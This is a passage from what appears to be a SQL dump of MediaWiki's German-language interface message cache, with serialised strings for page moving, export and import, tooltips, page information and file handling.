Verschiebung von „[[$1]]“ zu machen\";'),('de','messages:selfmove','s:93:\"Ursprungs- und Zielname sind gleich.\nEine Seite kann nicht auf sich selbst verschoben werden.\";'),('de','messages:immobile-source-namespace','s:63:\"Seiten des „$1“-Namensraums können nicht verschoben werden\";'),('de','messages:immobile-target-namespace','s:65:\"Seiten können nicht in den „$1“-Namensraum verschoben werden\";'),('de','messages:immobile-target-namespace-iw','s:65:\"Interwiki-Link ist kein gültiges Ziel für Seitenverschiebungen.\";'),('de','messages:immobile-source-page','s:35:\"Diese Seite ist nicht verschiebbar.\";'),('de','messages:immobile-target-page','s:52:\"Es kann nicht auf diese Zielseite verschoben werden.\";'),('de','messages:bad-target-model','s:143:\"Die gewünschte Zielseite verwendet ein abweichendes Inhaltsmodell. Das Inhaltsmodell $1 kann nicht in das Inhaltsmodell $2 umgewandelt werden.\";'),('de','messages:imagenocrossnamespace','s:77:\"Dateien können nicht aus dem {{ns:file}}-Namensraum heraus verschoben werden\";'),('de','messages:nonfile-cannot-move-to-file','s:81:\"Nichtdateien können nicht in den {{ns:file}}-Namensraum hinein verschoben werden\";'),('de','messages:imagetypemismatch','s:59:\"Die neue Dateierweiterung ist nicht mit der alten identisch\";'),('de','messages:imageinvalidfilename','s:32:\"Der Ziel-Dateiname ist ungültig\";'),('de','messages:fix-double-redirects','s:75:\"Nach dem Verschieben alle Weiterleitungen auf die Ursprungsseite bereinigen\";'),('de','messages:move-leave-redirect','s:23:\"Weiterleitung erstellen\";'),('de','messages:protectedpagemovewarning','s:176:\"\'\'\'Warnung:\'\'\' Diese Seite wurde so geschützt, dass sie nur von Benutzern mit Administratorenrechten verschoben werden kann.\nZur Information folgt der aktuelle Logbucheintrag:\";'),('de','messages:semiprotectedpagemovewarning','s:162:\"\'\'\'Hinweis:\'\'\' Diese Seite wurde so geschützt, dass sie nur von angemeldeten Benutzern verschoben werden kann.\nZur Information folgt der aktuelle Logbucheintrag:\";'),('de','messages:move-over-sharedrepo','s:168:\"==Datei existiert==\n[[:$1]] existiert in einem gemeinsam genutzten Repositorium. Das Verschieben einer Datei zu diesem Titel überschreibt die gemeinsam genutzte Datei.\";'),('de','messages:file-exists-sharedrepo','s:123:\"Der gewählte Dateiname wird bereits in einem gemeinsam genutzten Repositorium verwendet.\nBitte wähle einen anderen Namen.\";'),('de','messages:export','s:18:\"Seiten exportieren\";'),('de','messages:exporttext','s:500:\"Mit dieser Spezialseite kannst du den Text inklusive der Versionsgeschichte einzelner Seiten in eine XML-Datei exportieren.\nDie Datei kann in ein anderes MediaWiki-Wiki über die [[Special:Import|Importfunktion]] eingespielt werden.\n\nTrage den oder die entsprechenden Seitentitel in das folgende Textfeld ein (pro Zeile jeweils nur eine Seite).\n\nAlternativ ist der Export auch mit der Syntax [[{{#Special:Export}}/{{MediaWiki:Mainpage}}]] möglich, beispielsweise für die [[{{MediaWiki:Mainpage}}]].\";'),('de','messages:exportall','s:23:\"Alle Seiten exportieren\";'),('de','messages:exportcuronly','s:46:\"Nur die aktuelle Version der Seite exportieren\";'),('de','messages:exportnohistory','s:130:\"----\n\'\'\'Hinweis:\'\'\' Der Export kompletter Versionsgeschichten ist aus Gründen der Systemleistung bis auf Weiteres nicht möglich.\";'),('de','messages:exportlistauthors','s:74:\"Für jede Seite die jeweils vollständige Liste der Bearbeiter einbeziehen\";'),('de','messages:export-submit','s:18:\"Seiten exportieren\";'),('de','messages:export-addcattext','s:43:\"Seiten aus folgender Kategorie hinzufügen:\";'),('de','messages:export-addcat','s:11:\"Hinzufügen\";'),('de','messages:export-addnstext','s:44:\"Seiten aus folgendem Namensraum hinzufügen:\";'),('de','messages:export-addns','s:11:\"Hinzufügen\";'),('de','messages:export-download','s:23:\"Als XML-Datei speichern\";'),('de','messages:export-templates','s:18:\"Inklusive Vorlagen\";'),('de','messages:export-pagelinks','s:74:\"Verlinkte Seiten automatisch mit exportieren, bis zur Rekursionstiefe von:\";'),('de','messages:allmessages','s:27:\"MediaWiki-Systemnachrichten\";'),('de','messages:allmessagesname','s:4:\"Name\";'),('de','messages:allmessagesdefault','s:12:\"Standardtext\";'),('de','messages:allmessagescurrent','s:14:\"Aktueller Text\";'),('de','messages:allmessagestext','s:277:\"Dies ist eine Liste der MediaWiki-Systemtexte.\nBitte besuche die Seiten [https://www.mediawiki.org/wiki/Special:MyLanguage/Localisation MediaWiki-Lokalisierung] und [//translatewiki.net translatewiki.net], sofern du dich an der Lokalisierung von MediaWiki beteiligen möchtest.\";'),('de','messages:allmessagesnotsupportedDB','s:124:\"Diese Spezialseite steht nicht zur Verfügung, da sie über den Parameter $wgUseDatabaseMessages deaktiviert wurde.\";'),('de','messages:allmessages-filter-legend','s:6:\"Filter\";'),('de','messages:allmessages-filter','s:32:\"Filter für angepassten Zustand:\";'),('de','messages:allmessages-filter-unmodified','s:12:\"Unverändert\";'),('de','messages:allmessages-filter-all','s:4:\"Alle\";'),('de','messages:allmessages-filter-modified','s:9:\"Geändert\";'),('de','messages:allmessages-prefix','s:14:\"Präfixfilter:\";'),('de','messages:allmessages-language','s:8:\"Sprache:\";'),('de','messages:allmessages-filter-submit','s:3:\"Los\";'),('de','messages:allmessages-filter-translate','s:11:\"Übersetzen\";'),('de','messages:thumbnail-more','s:12:\"vergrößern\";'),('de','messages:filemissing','s:11:\"Datei fehlt\";'),('de','messages:thumbnail_error','s:44:\"Fehler beim Erstellen des Vorschaubildes: $1\";'),('de','messages:thumbnail_error_remote','s:24:\"Fehlermeldung von $1:\n$2\";'),('de','messages:djvu_page_error','s:40:\"DjVu-Seite außerhalb des Seitenbereichs\";'),('de','messages:djvu_no_xml','s:60:\"XML-Daten können für die DjVu-Datei nicht abgerufen werden\";'),('de','messages:thumbnail-temp-create','s:74:\"Die Datei für die temporäre Miniaturansicht konnte nicht erstellt werden\";'),('de','messages:thumbnail-dest-create','s:71:\"Die Miniaturansicht konnte nicht am vorgesehenen Ort gespeichert werden\";'),('de','messages:thumbnail_invalid_params','s:30:\"Ungültige Thumbnail-Parameter\";'),('de','messages:thumbnail_dest_directory','s:43:\"Zielverzeichnis kann nicht erstellt werden.\";'),('de','messages:thumbnail_image-type','s:26:\"Bildtyp nicht unterstützt\";'),('de','messages:thumbnail_gd-library','s:69:\"Unvollständige Konfiguration der GD-Bibliothek: Fehlende Funktion $1\";'),('de','messages:thumbnail_image-missing','s:33:\"Datei scheint fehlend zu sein: $1\";'),('de','messages:thumbnail_image-failure-limit','s:137:\"Es wurden in letzter Zeit zu viele Versuche ($1 oder mehr) unternommen, dieses Vorschaubild zu rendern. Bitte versuche es später erneut.\";'),('de','messages:import','s:18:\"Seiten importieren\";'),('de','messages:importinterwiki','s:16:\"Transwiki-Import\";'),('de','messages:import-interwiki-text','s:205:\"Wähle ein Wiki und eine Seite zum Importieren aus.\nDie Versionsdaten und Benutzernamen bleiben dabei erhalten.\nAlle Transwiki-Import-Aktionen werden im [[Special:Log/import|Import-Logbuch]] protokolliert.\";'),('de','messages:import-interwiki-sourcewiki','s:10:\"Quellwiki:\";'),('de','messages:import-interwiki-sourcepage','s:11:\"Quellseite:\";'),('de','messages:import-interwiki-history','s:39:\"Alle Versionen dieser Seite importieren\";'),('de','messages:import-interwiki-templates','s:27:\"Alle Vorlagen einschließen\";'),('de','messages:import-interwiki-submit','s:11:\"Importieren\";'),('de','messages:import-interwiki-namespace','s:15:\"Zielnamensraum:\";'),('de','messages:import-interwiki-rootpage','s:26:\"Zielstammseite (optional):\";'),('de','messages:import-upload-filename','s:10:\"Dateiname:\";'),('de','messages:import-comment','s:6:\"Grund:\";'),('de','messages:importtext','s:170:\"Bitte die Datei über die Spezialseite [[Special:Export|Exportfunktion]] aus dem Quellwiki exportieren.\nDiese auf dem lokalen Rechner speichern und danach hier hochladen.\";'),('de','messages:importstart','s:20:\"Importiere Seite …\";'),('de','messages:import-revision-count','s:40:\"– {{PLURAL:$1|1 Version|$1 Versionen}}\";'),('de','messages:importnopages','s:38:\"Keine Seite zum Importieren vorhanden.\";'),('de','messages:imported-log-entries','s:61:\"$1 {{PLURAL:$1|lLogbucheintrag|Logbucheinträge}} importiert.\";'),('de','messages:importfailed','s:25:\"Import fehlgeschlagen: $1\";'),('de','messages:importunknownsource','s:23:\"Unbekannte Importquelle\";'),('de','messages:importcantopen','s:41:\"Importdatei konnte nicht geöffnet werden\";'),('de','messages:importbadinterwiki','s:23:\"Falscher Interwiki-Link\";'),('de','messages:importsuccess','s:21:\"Import abgeschlossen.\";'),('de','messages:importnosources','s:105:\"Für den Transwiki-Import sind keine Quellen definiert. Das direkte Hochladen von Versionen ist gesperrt.\";'),('de','messages:importnofile','s:44:\"Es ist keine Importdatei ausgewählt worden.\";'),('de','messages:importuploaderrorsize','s:111:\"Das Hochladen der Importdatei ist fehlgeschlagen. Die Datei ist größer als die maximal erlaubte Dateigröße.\";'),('de','messages:importuploaderrorpartial','s:92:\"Das Hochladen der Importdatei ist fehlgeschlagen. Die Datei wurde nur teilweise hochgeladen.\";'),('de','messages:importuploaderrortemp','s:84:\"Das Hochladen der Importdatei ist fehlgeschlagen. Ein temporäres Verzeichnis fehlt.\";'),('de','messages:import-parse-failure','s:23:\"Fehler beim XML-Import:\";'),('de','messages:import-noarticle','s:48:\"Es wurde keine zu importierende Seite angegeben!\";'),('de','messages:import-nonewrevisions','s:123:\"Es wurden keine Versionen importiert. Entweder waren alle bereits vorhanden oder wurden aufgrund von Fehlern übersprungen.\";'),('de','messages:xml-error-string','s:37:\"$1 Zeile $2, Spalte $3, (Byte $4): $5\";'),('de','messages:import-upload','s:23:\"XML-Dateien importieren\";'),('de','messages:import-token-mismatch','s:51:\"Verlust der Sessiondaten. Bitte versuche es erneut.\";'),('de','messages:import-invalid-interwiki','s:50:\"Aus dem angegebenen Wiki ist kein Import möglich.\";'),('de','messages:import-error-edit','s:90:\"Die Seite „$1“ wurde nicht importiert, da du nicht berechtigt bist, sie zu bearbeiten.\";'),('de','messages:import-error-create','s:89:\"Die Seite „$1“ wurde nicht importiert, da du nicht berechtigt bist, sie zu erstellen.\";'),('de','messages:import-error-interwiki','s:103:\"Die Seite „$1“ wurde nicht importiert, da deren Name für externe Links (Interwiki) reserviert ist.\";'),('de','messages:import-error-special','s:124:\"Die Seite „$1“ wurde nicht importiert, da sie zu einem besonderen Namensraum gehört, in dem keine Seiten möglich sind.\";'),('de','messages:import-error-invalid','s:123:\"Seite „$1“ wurde nicht importiert, da der Name, zu dem sie importiert werden würde, auf diesem Wiki nicht gültig ist.\";'),('de','messages:import-error-unserialize','s:163:\"Die Version $2 der Seite „$1“ konnte nicht deserialisiert werden. Die Version wurde zur Verwendung des Inhaltsmodells $3 gemeldet, das als $4 serialisiert ist.\";'),('de','messages:import-error-bad-location','s:172:\"Die Version $2, die das Inhaltsmodell $3 verwendet, kann auf diesem Wiki nicht unter „$1“ gespeichert werden, da dieses Modell auf dieser Seite nicht unterstützt wird.\";'),('de','messages:import-options-wrong','s:58:\"Falsche {{PLURAL:$2|Option|Optionen}}: $1\";'),('de','messages:import-rootpage-invalid','s:45:\"Der angegebene Stammseitenname ist ungültig.\";'),('de','messages:import-rootpage-nosubpage','s:69:\"Im Namensraum „$1“ der Stammseite sind keine Unterseiten erlaubt.\";'),('de','messages:importlogpage','s:14:\"Import-Logbuch\";'),('de','messages:importlogpagetext','s:75:\"Administrativer Import von Seiten mit Versionsgeschichte von anderen Wikis.\";'),('de','messages:import-logentry-upload','s:40:\"importierte „[[$1]]“ von einer Datei\";'),('de','messages:import-logentry-upload-detail','s:45:\"$1 {{PLURAL:$1|Version|Versionen}} importiert\";'),('de','messages:import-logentry-interwiki','s:32:\"importierte „$1“ (Transwiki)\";'),('de','messages:import-logentry-interwiki-detail','s:52:\"$1 {{PLURAL:$1|Version|Versionen}} von $2 importiert\";'),('de','messages:javascripttest','s:15:\"JavaScript-Test\";'),('de','messages:javascripttest-title','s:29:\"$1-Tests werden durchgeführt\";'),('de','messages:javascripttest-pagetext-noframework','s:45:\"Diese Seite ist JavaSkript-Tests vorbehalten.\";'),('de','messages:javascripttest-pagetext-unknownframework','s:31:\"Unbekanntes Framework „$1“.\";'),('de','messages:javascripttest-pagetext-frameworks','s:55:\"Bitte wähle eine der folgenden Prüfumgebungen aus: $1\";'),('de','messages:javascripttest-pagetext-skins','s:64:\"Wähle eine Benutzeroberfläche zur Durchführung der Tests aus:\";'),('de','messages:javascripttest-qunit-intro','s:55:\"Siehe die [$1 Dokumentation zu Tests] auf mediawiki.org\";'),('de','messages:javascripttest-qunit-heading','s:33:\"MediaWiki-JavaSkript-QUnit-Tester\";'),('de','messages:tooltip-pt-userpage','s:19:\"Deine Benutzerseite\";'),('de','messages:tooltip-pt-anonuserpage','s:68:\"Benutzerseite der IP-Adresse von der aus du Änderungen durchführst\";'),('de','messages:tooltip-pt-mytalk','s:22:\"Deine Diskussionsseite\";'),('de','messages:tooltip-pt-anontalk','s:50:\"Diskussion über Änderungen von dieser IP-Adresse\";'),('de','messages:tooltip-pt-preferences','s:20:\"Eigene Einstellungen\";'),('de','messages:tooltip-pt-watchlist','s:29:\"Liste der beobachteten Seiten\";'),('de','messages:tooltip-pt-mycontris','s:23:\"Liste eigener Beiträge\";'),('de','messages:tooltip-pt-login','s:64:\"Sich anzumelden wird zwar gerne gesehen, ist aber keine Pflicht.\";'),('de','messages:tooltip-pt-logout','s:8:\"Abmelden\";'),('de','messages:tooltip-ca-talk','s:27:\"Diskussion zum Seiteninhalt\";'),('de','messages:tooltip-ca-edit','s:72:\"Seite bearbeiten. Bitte vor dem Speichern die Vorschaufunktion benutzen.\";'),('de','messages:tooltip-ca-addsection','s:24:\"Neuen Abschnitt beginnen\";'),('de','messages:tooltip-ca-viewsource','s:84:\"Diese Seite ist geschützt. Ihr Quelltext kann dennoch angesehen und kopiert werden.\";'),('de','messages:tooltip-ca-history','s:31:\"Frühere Versionen dieser Seite\";'),('de','messages:tooltip-ca-protect','s:21:\"Diese Seite schützen\";'),('de','messages:tooltip-ca-unprotect','s:20:\"Seitenschutz ändern\";'),('de','messages:tooltip-ca-delete','s:20:\"Diese Seite löschen\";'),('de','messages:tooltip-ca-undelete','s:61:\"Einträge wiederherstellen, bevor diese Seite gelöscht wurde\";'),('de','messages:tooltip-ca-move','s:23:\"Diese Seite verschieben\";'),('de','messages:tooltip-ca-watch','s:59:\"Diese Seite zur persönlichen Beobachtungsliste hinzufügen\";'),('de','messages:tooltip-ca-unwatch','s:61:\"Diese Seite von der persönlichen Beobachtungsliste entfernen\";'),('de','messages:tooltip-search','s:24:\"{{SITENAME}} durchsuchen\";'),('de','messages:tooltip-search-go','s:70:\"Gehe direkt zu der Seite, die exakt dem eingegebenen Namen entspricht.\";'),('de','messages:tooltip-search-fulltext','s:44:\"Suche nach Seiten, die diesen Text enthalten\";'),('de','messages:tooltip-p-logo','s:10:\"Hauptseite\";'),('de','messages:tooltip-n-mainpage','s:19:\"Hauptseite anzeigen\";'),('de','messages:tooltip-n-mainpage-description','s:19:\"Hauptseite besuchen\";'),('de','messages:tooltip-n-portal','s:58:\"Über das Projekt, was du tun kannst, wo was zu finden ist\";'),('de','messages:tooltip-n-currentevents','s:49:\"Hintergrundinformationen zu aktuellen Ereignissen\";'),('de','messages:tooltip-n-recentchanges','s:45:\"Liste der letzten Änderungen in {{SITENAME}}\";'),('de','messages:tooltip-n-randompage','s:25:\"Zufällige Seite aufrufen\";'),('de','messages:tooltip-n-help','s:19:\"Hilfeseite anzeigen\";'),('de','messages:tooltip-t-whatlinkshere','s:41:\"Liste aller Seiten, die hierher verlinken\";'),('de','messages:tooltip-t-recentchangeslinked','s:56:\"Letzte Änderungen an Seiten, die von hier verlinkt sind\";'),('de','messages:tooltip-feed-rss','s:21:\"RSS-Feed dieser Seite\";'),('de','messages:tooltip-feed-atom','s:22:\"Atom-Feed dieser Seite\";'),('de','messages:tooltip-t-contributions','s:47:\"Liste der Beiträge von diesem Benutzer ansehen\";'),('de','messages:tooltip-t-emailuser','s:37:\"Eine E-Mail an diesen Benutzer senden\";'),('de','messages:tooltip-t-upload','s:17:\"Dateien hochladen\";'),('de','messages:tooltip-t-specialpages','s:25:\"Liste aller Spezialseiten\";'),('de','messages:tooltip-t-print','s:25:\"Druckansicht dieser Seite\";'),('de','messages:tooltip-t-permalink','s:40:\"Dauerhafter Link zu dieser Seitenversion\";'),('de','messages:tooltip-ca-nstab-main','s:21:\"Seiteninhalt anzeigen\";'),('de','messages:tooltip-ca-nstab-user','s:22:\"Benutzerseite anzeigen\";'),('de','messages:tooltip-ca-nstab-media','s:27:\"Mediendateienseite anzeigen\";'),('de','messages:tooltip-ca-nstab-special','s:61:\"Dies ist eine Spezialseite. Sie kann nicht bearbeitet werden.\";'),('de','messages:tooltip-ca-nstab-project','s:20:\"Portalseite anzeigen\";'),('de','messages:tooltip-ca-nstab-image','s:19:\"Dateiseite anzeigen\";'),('de','messages:tooltip-ca-nstab-mediawiki','s:29:\"MediaWiki-Systemtext anzeigen\";'),('de','messages:tooltip-ca-nstab-template','s:16:\"Vorlage anzeigen\";'),('de','messages:tooltip-ca-nstab-help','s:19:\"Hilfeseite anzeigen\";'),('de','messages:tooltip-ca-nstab-category','s:23:\"Kategorieseite anzeigen\";'),('de','messages:tooltip-minoredit','s:36:\"Diese Änderung als klein markieren.\";'),('de','messages:tooltip-save','s:21:\"Änderungen speichern\";'),('de','messages:tooltip-preview','s:75:\"Vorschau der Änderungen an dieser Seite. Bitte vor dem Speichern benutzen!\";'),('de','messages:tooltip-diff','s:26:\"Änderungen am Text zeigen\";'),('de','messages:tooltip-compareselectedversions','s:71:\"Unterschied zwischen zwei ausgewählten Versionen dieser Seite anzeigen\";'),('de','messages:tooltip-watch','s:51:\"Diese Seite zu deiner Beobachtungsliste hinzufügen\";'),('de','messages:tooltip-watchlistedit-normal-submit','s:19:\"Einträge entfernen\";'),('de','messages:tooltip-watchlistedit-raw-submit','s:31:\"Beobachtungsliste aktualisieren\";'),('de','messages:tooltip-recreate','s:47:\"Seite neu erstellen, obwohl sie gelöscht wurde\";'),('de','messages:tooltip-upload','s:17:\"Hochladen starten\";'),('de','messages:tooltip-rollback','s:128:\"Macht alle letzten Änderungen der Seite, die vom gleichen Benutzer vorgenommen worden sind, durch nur einen Klick rückgängig.\";'),('de','messages:tooltip-undo','s:167:\"Macht lediglich diese eine Änderung rückgängig und zeigt das Resultat in der Vorschau an, damit in der Zusammenfassungszeile eine Begründung angegeben werden kann.\";'),('de','messages:tooltip-preferences-save','s:23:\"Einstellungen speichern\";'),('de','messages:tooltip-summary','s:35:\"Gib eine kurze Zusammenfassung ein.\";'),('de','messages:interlanguage-link-title','s:9:\"$1 – $2\";'),('de','messages:interlanguage-link-title-nonlang','s:9:\"$1 – $2\";'),('de','messages:common.css','s:67:\"/* Das folgende CSS wird für alle Benutzeroberflächen geladen. */\";'),('de','messages:print.css','s:56:\"/* Das folgende CSS wird in der Druckausgabe geladen. */\";'),('de','messages:noscript.css','s:85:\"/* Das folgende CSS wirkt sich für Benutzer aus, die JavaScript deaktiviert haben */\";'),('de','messages:group-autoconfirmed.css','s:82:\"/* CSS an dieser Stelle wirkt sich nur auf automatisch bestätigte Benutzer aus */\";'),('de','messages:group-user.css','s:70:\"/* CSS an dieser Stelle wirkt sich nur auf angemeldete Benutzer aus */\";'),('de','messages:group-bot.css','s:54:\"/* CSS an dieser Stelle wirkt sich nur auf Bots aus */\";'),('de','messages:group-sysop.css','s:65:\"/* CSS an dieser Stelle wirkt sich nur auf Administratoren aus */\";'),('de','messages:group-bureaucrat.css','s:57:\"/* Das folgende CSS wird nur für Bürokraten geladen. */\";'),('de','messages:common.js','s:62:\"/* Das folgende JavaScript wird für alle Benutzer geladen. */\";'),('de','messages:group-autoconfirmed.js','s:85:\"/* Das folgende JavaScript wird nur für automatisch bestätigte Benutzer geladen. */\";'),('de','messages:group-user.js','s:73:\"/* Das folgende JavaScript wird nur für angemeldete Benutzer geladen. */\";'),('de','messages:group-bot.js','s:57:\"/* Das folgende JavaScript wird nur für Bots geladen. */\";'),('de','messages:group-sysop.js','s:68:\"/* Das folgende JavaScript wird nur für Administratoren geladen. */\";'),('de','messages:group-bureaucrat.js','s:64:\"/* Das folgende JavaScript wird nur für Bürokraten geladen. */\";'),('de','messages:anonymous','s:77:\"{{PLURAL:$1|Unangemeldeter Benutzer|Unangemeldete Benutzer}} auf {{SITENAME}}\";'),('de','messages:siteuser','s:58:\"{{SITENAME}}-{{GENDER:$2|Benutzer|Benutzerin|Benutzer}} $1\";'),('de','messages:anonuser','s:33:\"Anonymer {{SITENAME}}-Benutzer $1\";'),('de','messages:lastmodifiedatby','s:59:\"Diese Seite wurde zuletzt am $1 um $2 Uhr von $3 geändert.\";'),('de','messages:othercontribs','s:32:\"Basierend auf der Arbeit von $1.\";'),('de','messages:others','s:7:\"anderen\";'),('de','messages:siteusers','s:38:\"{{SITENAME}}-{{PLURAL:$2|Benutzer}} $1\";'),('de','messages:anonusers','s:92:\"{{PLURAL:$2|unangemeldetem|unangemeldeten}} {{SITENAME}}-{{PLURAL:$2|Benutzer|Benutzern}} $1\";'),('de','messages:creditspage','s:19:\"Seiteninformationen\";'),('de','messages:nocredits','s:52:\"Für diese Seite sind keine Informationen vorhanden.\";'),('de','messages:spamprotectiontitle','s:16:\"Spamschutzfilter\";'),('de','messages:spamprotectiontext','s:135:\"Der Text, die du speichern willst, wurde vom Spamschutzfilter blockiert.\nDas liegt wahrscheinlich an einem Link auf eine externe Seite.\";'),('de','messages:spamprotectionmatch','s:61:\"\'\'\'Der folgende Text wurde vom Spamfilter gefunden: \'\'$1\'\'\'\'\'\";'),('de','messages:spambot_username','s:25:\"MediaWiki-Spam-Säuberung\";'),('de','messages:spam_reverting','s:50:\"Letzte Version ohne Links zu $1 wiederhergestellt.\";'),('de','messages:spam_blanking','s:53:\"Alle Versionen mit einem Link zu $1 wurden bereinigt.\";'),('de','messages:spam_deleting','s:53:\"Alle Versionen mit einem Link zu $1 wurden gelöscht.\";'),('de','messages:simpleantispam-label','s:48:\"Spamschutzprüfung.\nHier \'\'\'NICHTS\'\'\' eintragen!\";'),('de','messages:pageinfo-title','s:25:\"Informationen zu „$1“\";'),('de','messages:pageinfo-not-current','s:87:\"Diese Information kann leider nicht für alte Versionen zur Verfügung gestellt werden.\";'),('de','messages:pageinfo-header-basic','s:18:\"Basisinformationen\";'),('de','messages:pageinfo-header-edits','s:22:\"Bearbeitungsgeschichte\";'),('de','messages:pageinfo-header-restrictions','s:12:\"Seitenschutz\";'),('de','messages:pageinfo-header-properties','s:19:\"Seiteneigenschaften\";'),('de','messages:pageinfo-display-title','s:12:\"Anzeigetitel\";'),('de','messages:pageinfo-default-sort','s:25:\"Standardsortierschlüssel\";'),('de','messages:pageinfo-length','s:23:\"Seitenlänge (in Bytes)\";'),('de','messages:pageinfo-article-id','s:16:\"Seitenkennnummer\";'),('de','messages:pageinfo-language','s:20:\"Seiteninhaltssprache\";'),('de','messages:pageinfo-content-model','s:19:\"Seiteninhaltsmodell\";'),('de','messages:pageinfo-robot-policy','s:31:\"Indizierung durch Suchmaschinen\";'),('de','messages:pageinfo-robot-index','s:7:\"Erlaubt\";'),('de','messages:pageinfo-robot-noindex','s:13:\"Nicht erlaubt\";'),('de','messages:pageinfo-views','s:24:\"Anzahl der Seitenaufrufe\";'),('de','messages:pageinfo-watchers','s:31:\"Anzahl der Beobachter der Seite\";'),('de','messages:pageinfo-few-watchers','s:43:\"Weniger als {{PLURAL:$1|ein|$1}} Beobachter\";'),('de','messages:pageinfo-redirects-name','s:42:\"Anzahl der Weiterleitungen zu dieser Seite\";'),('de','messages:pageinfo-redirects-value','s:2:\"$1\";'),('de','messages:pageinfo-subpages-name','s:24:\"Unterseiten dieser Seite\";'),('de','messages:pageinfo-subpages-value','s:92:\"$1 ($2 {{PLURAL:$2|Weiterleitung|Weiterleitungen}}; $3 {{PLURAL:$3|Unterseite|Unterseiten}})\";'),('de','messages:pageinfo-firstuser','s:15:\"Seitenersteller\";'),('de','messages:pageinfo-firsttime','s:26:\"Datum der Seitenerstellung\";'),('de','messages:pageinfo-lastuser','s:18:\"Letzter Bearbeiter\";'),('de','messages:pageinfo-lasttime','s:29:\"Datum der letzten Bearbeitung\";'),('de','messages:pageinfo-edits','s:28:\"Gesamtzahl der Bearbeitungen\";'),('de','messages:pageinfo-authors','s:36:\"Gesamtzahl unterschiedlicher Autoren\";'),('de','messages:pageinfo-recent-edits','s:71:\"Anzahl der kürzlich erfolgten Bearbeitungen (innerhalb der letzten $1)\";'),('de','messages:pageinfo-recent-authors','s:70:\"Anzahl unterschiedlicher Autoren der kürzlich erfolgten Bearbeitungen\";'),('de','messages:pageinfo-magic-words','s:50:\"{{PLURAL:$1|Magisches Wort|Magische Wörter}} ($1)\";'),('de','messages:pageinfo-hidden-categories','s:50:\"Versteckte {{PLURAL:$1|Kategorie|Kategorien}} ($1)\";'),('de','messages:pageinfo-templates','s:48:\"Eingebundene {{PLURAL:$1|Vorlage|Vorlagen}} ($1)\";'),('de','messages:pageinfo-transclusions','s:46:\"Eingebunden in {{PLURAL:$1|1 Seite|$1 Seiten}}\";'),('de','messages:pageinfo-toolboxlink','s:19:\"Seiteninformationen\";'),('de','messages:pageinfo-redirectsto','s:20:\"Weiterleitungen nach\";'),('de','messages:pageinfo-redirectsto-info','s:11:\"Information\";'),('de','messages:pageinfo-contentpage','s:30:\"Gezählt als eine Inhaltsseite\";'),('de','messages:pageinfo-contentpage-yes','s:2:\"Ja\";'),('de','messages:pageinfo-protect-cascading','s:34:\"Seiten mit Kaskadenschutz von hier\";'),('de','messages:pageinfo-protect-cascading-yes','s:2:\"Ja\";'),('de','messages:pageinfo-protect-cascading-from','s:29:\"Seiten mit Kaskadenschutz von\";'),('de','messages:pageinfo-category-info','s:22:\"Kategorieinformationen\";'),('de','messages:pageinfo-category-pages','s:17:\"Anzahl der Seiten\";'),('de','messages:pageinfo-category-subcats','s:26:\"Anzahl der Unterkategorien\";'),('de','messages:pageinfo-category-files','s:18:\"Anzahl der Dateien\";'),('de','messages:markaspatrolleddiff','s:26:\"Als kontrolliert markieren\";'),('de','messages:markaspatrolledtext','s:38:\"Diese Seite als kontrolliert markieren\";'),('de','messages:markedaspatrolled','s:25:\"Als kontrolliert markiert\";'),('de','messages:markedaspatrolledtext','s:69:\"Die ausgewählte Version von [[:$1]] wurde als kontrolliert markiert.\";'),('de','messages:rcpatroldisabled','s:42:\"Kontrolle der letzten Änderungen gesperrt\";'),('de','messages:rcpatroldisabledtext','s:59:\"Die Kontrolle der letzten Änderungen ist zurzeit gesperrt.\";'),('de','messages:markedaspatrollederror','s:49:\"Markierung als „kontrolliert“ nicht möglich.\";'),('de','messages:markedaspatrollederrortext','s:41:\"Du musst eine Seitenänderung auswählen.\";'),('de','messages:markedaspatrollederror-noautopatrol','s:73:\"Es ist nicht erlaubt, eigene Bearbeitungen als kontrolliert zu markieren.\";'),('de','messages:markedaspatrollednotify','s:54:\"Diese Änderung an $1 wurde als kontrolliert markiert.\";'),('de','messages:markedaspatrollederrornotify','s:75:\"Der Versuch, die Version als kontrolliert zu markieren, ist fehlgeschlagen.\";'),('de','messages:patrol-log-page','s:16:\"Kontroll-Logbuch\";'),('de','messages:patrol-log-header','s:30:\"Dies ist das Kontroll-Logbuch.\";'),('de','messages:log-show-hide-patrol','s:19:\"Kontroll-Logbuch $1\";'),('de','messages:deletedrevision','s:25:\"alte Version $1 gelöscht\";'),('de','messages:filedeleteerror-short','s:30:\"Fehler bei Datei-Löschung: $1\";'),('de','messages:filedeleteerror-long','s:55:\"Bei der Datei-Löschung wurden Fehler festgestellt:\n\n$1\";'),('de','messages:filedelete-missing','s:75:\"Die Datei „$1“ kann nicht gelöscht werden, da sie nicht vorhanden ist.\";'),('de','messages:filedelete-old-unregistered','s:75:\"Die angegebene Datei-Version „$1“ ist nicht in der Datenbank vorhanden.\";'),('de','messages:filedelete-current-unregistered','s:67:\"Die angegebene Datei „$1“ ist nicht in der Datenbank vorhanden.\";'),('de','messages:filedelete-archive-read-only','s:74:\"Das Archiv-Verzeichnis „$1“ ist für den Webserver nicht beschreibbar.\";'),('de','messages:previousdiff','s:38:\"← Zum vorherigen Versionsunterschied\";'),('de','messages:nextdiff','s:37:\"Zum nächsten Versionsunterschied →\";'),('de','messages:mediawarning','s:157:\"\'\'\'Warnung:\'\'\' Dieser Dateityp kann böswilligen Programmcode enthalten.\nDurch das Herunterladen und Öffnen der Datei kann dein Computer beschädigt werden.\";'),('de','messages:imagemaxsize','s:62:\"Maximale Bildgröße:
                                                                \'\'(für Dateibeschreibungsseiten)\'\'\";'),('de','messages:thumbsize','s:35:\"Standardgröße der Vorschaubilder:\";'),('de','messages:widthheightpage','s:41:\"$1 × $2, {{PLURAL:$3|1 Seite|$3 Seiten}}\";'),('de','messages:file-info','s:30:\"Dateigröße: $1, MIME-Typ: $2\";'),('de','messages:file-info-size','s:46:\"$1 × $2 Pixel, Dateigröße: $3, MIME-Typ: $4\";'),('de','messages:file-info-size-pages','s:78:\"$1 × $2 Pixel, Dateigröße: $3, MIME-Typ: $4, $5 {{PLURAL:$5|Seite| Seiten}}\";'),('de','messages:file-nohires','s:35:\"Keine höhere Auflösung vorhanden.\";'),('de','messages:svg-long-desc','s:57:\"SVG-Datei, Basisgröße: $1 × $2 Pixel, Dateigröße: $3\";'),('de','messages:svg-long-desc-animated','s:66:\"Animierte SVG-Datei, Basisgröße $1 × $2 Pixel, Dateigröße: $3\";'),('de','messages:svg-long-error','s:24:\"Ungültige SVG-Datei: 